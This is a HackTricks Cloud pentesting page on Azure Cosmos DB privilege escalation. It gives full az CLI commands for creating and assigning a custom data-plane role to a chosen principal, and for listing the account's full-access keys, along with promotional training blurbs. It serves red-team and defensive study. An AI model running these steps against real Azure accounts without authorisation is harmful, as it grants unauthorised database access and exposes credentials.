HackTricks CloudAz - CosmosDB Privesc
Reading time: 3 minutes
{% hint style="success" %}
Learn & practice AWS Hacking: (1) (1) (1).png)
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:  (1).png)
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
CosmosDB Privesc
For more information about SQL Database check:
{% content-ref url="../az-services/az-cosmosDB.md" %} az-cosmosDB.md {% endcontent-ref %}
("Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read") & ("Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write", "Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read")
With this permissions you can priviledge scalate giving a user the pemrissions to execute queries and connect to the database. First a definition role is created giving the necesary permissions and scopes.
{% code overflow="wrap" %}
az cosmosdb sql role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<Random-Unique-ID>", # For example 12345678-1234-1234-1234-123456789az
"RoleName": "CustomReadRole",
"Type": "CustomRole",
"AssignableScopes": [
"/subscriptions/<subscription_id>/resourceGroups/sqldatabase/providers/Microsoft.DocumentDB/databaseAccounts/<account_name>"
],
"Permissions": [
{
"DataActions": [
"Microsoft.DocumentDB/databaseAccounts/readMetadata",
"Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/items/read",
"Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/*"
]
}
]
}'
{% endcode %}
After that the assigment of the definition is given to a user. After this that user can use the DefaultAzureCredential() connection method to execute queries.
{% code overflow="wrap" %}
az cosmosdb sql role assignment create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--role-definition-id <Random-Unique-ID-used-in-definition> \
--principal-id <principal_id-togive-perms> \
--scope "/"
{% endcode %}
"Microsoft.DocumentDB/databaseAccounts/listKeys/action"
With this permission, you can retrieve the primary and secondary keys for an Azure Cosmos DB account. These keys provide full access to the database account and its resources, enabling actions such as data reads, writes, and configuration changes.
{% code overflow="wrap" %}
az cosmosdb keys list \
--name <account_name> \
--resource-group <resource_group_name>
{% endcode %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.